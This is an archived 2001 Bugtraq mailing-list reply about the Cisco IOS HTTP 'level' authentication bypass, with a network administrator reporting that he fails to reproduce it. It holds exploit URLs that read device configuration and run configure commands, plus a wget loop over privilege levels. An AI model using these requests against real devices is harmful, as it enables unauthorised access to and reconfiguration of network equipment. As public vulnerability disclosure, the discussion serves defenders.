[21326] in bugtraq
Re: Cisco device HTTP exploit...
daemon@ATHENA.MIT.EDU (Marc-Adrian Napoli)
Tue Jul 3 15:17:27 2001
Message-ID: <041e01c1038d$76822fc0$94db3fcb@cia.com.au>
From: "Marc-Adrian Napoli" <marcadrian@cia.com.au>
To: "Half Adder" <dps@Lib-Vai.lib.asu.edu>, <bugtraq@securityfocus.com>
Date: Tue, 3 Jul 2001 16:57:45 +1000
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
hi,
i cant seem to recreate this exploit on any of my 1900/2900/2500/2600's?
ip http server
ip http authentication local
i have a little /bin/sh that does the following:
wget http://10.10.10.10/level/16/show/config
.
.
wget http://10.10.10.10/level/99/show/config
i get auth failed on all of them! anyone?
Regards,
Marc-Adrian Napoli
Network Administrator
Connect infobahn Australia
+61 2 92120387
> You can also run configuration commands. :)
>
> http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.
>
> Start with http://169.254.0.16/level/xx/configure and go from there.
>
> A malicious user could use:
>
> http://169.254.0.15/level/42/exec/show%20conf
>
> to get, for instance, vty 0 4 acl information and then add an ACL for
> his/her source ip.
>
> I tested creating a banner. I assume other configure commands will work
> as well. This was tested on a Cisco switch. Anyone?
>
>
>
>
